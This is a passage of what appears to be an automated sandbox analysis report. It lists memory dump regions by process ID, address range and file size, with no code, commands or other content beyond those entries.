                                                                                                    • memory/4236-228-0x0000000000B20000-0x0000000000B22000-memory.dmp
                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4320-229-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4320-257-0x0000000003270000-0x00000000032B8000-memory.dmp
                                                                                                      Filesize

                                                                                                      288KB

                                                                                                    • memory/4320-232-0x0000000000740000-0x000000000074D000-memory.dmp
                                                                                                      Filesize

                                                                                                      52KB

                                                                                                    • memory/4328-248-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4380-353-0x0000000000402F68-mapping.dmp
                                                                                                    • memory/4392-355-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4432-300-0x0000000004B50000-0x0000000004BAC000-memory.dmp
                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/4432-271-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4432-290-0x000000000300A000-0x000000000310B000-memory.dmp
                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/4500-263-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4580-260-0x00000001401FBC30-mapping.dmp
                                                                                                    • memory/4580-266-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                      Filesize

                                                                                                      3.5MB

                                                                                                    • memory/4580-259-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                      Filesize

                                                                                                      3.5MB

                                                                                                    • memory/4744-347-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4752-362-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4876-364-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4960-368-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4964-351-0x0000000000000000-mapping.dmp
                                                                                                    • memory/4976-336-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5032-349-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5084-241-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5168-363-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5216-296-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5216-324-0x00000000036F0000-0x0000000003700000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5252-360-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5276-302-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5332-345-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5408-361-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5460-310-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5592-354-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5660-333-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5696-367-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5716-313-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5720-356-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5836-350-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5848-369-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5872-320-0x0000000000000000-mapping.dmp
                                                                                                    • memory/5976-348-0x0000000000000000-mapping.dmp
                                                                                                    • memory/6032-339-0x0000000000000000-mapping.dmp
                                                                                                    • memory/6064-319-0x0000000000000000-mapping.dmp
                                                                                                    • memory/6092-358-0x0000000000000000-mapping.dmp
                                                                                                    • memory/6116-341-0x0000000000000000-mapping.dmp